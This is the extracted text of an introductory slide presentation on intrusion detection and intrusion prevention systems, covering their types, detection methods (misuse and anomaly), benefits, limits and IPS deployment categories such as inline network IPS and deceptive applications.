Text of 1. INTRUSION Intrusion Detection system Intrusion Preventation system 2
INTRUSION Intrusion Detection system Intrusion Preventation system 2
What is intrusion??? INTRUSIONS are the activities that violate the security policy of system. Intrusion Detection System (IDS) : is software that automates the intrusion detection process. The primary responsibility of an IDS is to detect unwanted activities. Intrusion Prevention System (IPS) : is software that has all the capabilities of an intrusion detection system and can also attempt to stop possible incidents. 3
Types of IDS Based on the sources of the audit information used by each IDS, the IDSs may be classified into Host-base IDSs Distributed IDSs Network-based IDSs 5
Types in little details. Host Based IDS Get data from host trails. Detect attacks against a single host Distributed IDS Gather data from multiple host and possibly the network that connects the hosts Detect attacks involving multiple hosts Network-Based IDS Detect attacks from network. 6
Misuse Detection Based on known attack actions. Feature extract from known intrusions Integrate the Human knowledge. The rules are pre-defined Disadvantage: Cannot detect novel or unknown attacks 8
Anomaly Detection Based on the normal behavior of a subject. Sometime assume the training data does not include intrusion data. This type of detection is known as anomaly detection. Here any action that significantly deviates from the normal behavior is considered intrusion. 9
Anomaly Detection Disadvantages Based on data collected over a period of normal operation. When a noise(intrusion) data in the training data, it will make a mis-classification. 10
11 Some of the benefits of IDS monitors the operation of firewalls, routers, key management servers and files critical to other security mechanisms allows administrator to tune, organize and comprehend often incomprehensible operating system audit trails and other logs can make the security management of systems by non-expert staff possible by providing nice user friendly interface comes with extensive attack signature database against which information from the customers system can be matched can recognize and report alterations to data files
12 SILVER BULLET IDS is not a SILVER BULLET cannot conduct investigations of attacks without human intervention cannot compensate for weaknesses in network protocols cannot compensate for weak identification and authentication mechanisms capable of monitoring network traffic but to a certain extent of traffic level
Intrusion Prevention System Intrusion prevention systems are network security devices that monitor network and/or system activities for malicious activity (intrusion) Main functions of Intrusion Prevention System (IPS) are: Identify intrusion Log information about intrusion Attempt to block/stop intrusion and Report intrusion Intrusion Detection System (IDS) only detect intrusions 14
Intrusion Prevention System (IPS) is any device (hardware or software) that has the ability to detect attacks, both known and unknown, and prevent the attack from being successful. WHAT IS IPS?
Intrusion Prevention Systems (IPS) The bad guys are always one step ahead of the security professionals. Security professionals try and come up with innovative means to detect and prevent attacks. IPS is a preventive device rather than a detective device (IDS).
Broadly classified into two categories Host IPS (HIPS) Network IPS (NIPS) CLASSIFICATION OF IPS
HIPS is installed directly on the system being protected It binds closely with the operating system kernel and services, it monitors and intercepts system calls to the kernel in order to prevent attacks as well as log them. HOST-IPS
Has two network interfaces, one designated as internal and one as external. Packets passed through both interfaces and they determined whether the packet being examined poses a threat. If it detects a malicious packet, an alert is raised, the packets are discarded immediately. Legitimate packets are passed through to the second interface and on to their intended destination. NETWORK-IPS
INLINE NETWORK IPS It is configured with two NICs, one for management and one for detection. NIC that is configured for detection usually does not have an IP address assigned. It works by sitting between the systems that need to be protected and the rest of the network. It inspects the packet for any intrusion that it is configured to look for.
LAYER SEVEN SWITCHES Placing these devices in front of your firewalls would give protection for the entire network. However the drawbacks are that they can only stop attacks that they know about. The only attack they can stop that most others IPS cant are the DoS attacks.
APPLICATION FIREWALLS These IPSs are loaded on each server that is to be protected. These types of IPSs are customizable to each application that they are to protect. It profiles a system before protecting it. During the profiling it watches the users interaction with the application and the applications interaction with the operating system to determine what legitimate interaction looks like. The drawback is that when the application is updated it might have to be profiled again so that it does not block legitimate use.
HYBRID SWITCHES They inspect specific traffic for malicious content as has been configured. Hybrid switch works in similar manner to layer seven switch, but has detailed knowledge of the web server and the application that sits on top of the web server. It also fails,if the users request does not match any of the permitted requests.
DECEPTIVE APPLICATIONS It watches all your network traffic and figures out what is good traffic. When an attacker attempts to connect to services that do not exist, it will send back a response to the attacker The response will be marked with some bogus data. When the attacker comes back again and tries to exploit the server the IPS will see the marked data and stop all traffic coming from the attacker.
26 Bibliography  An Introduction To Intrusion Detection Systems http://www.securityfocusonline.com  Intrusion Detection and Prevention Product Update http://www.cisco.com  An Introduction to Intrusion Detection http://www.acm.org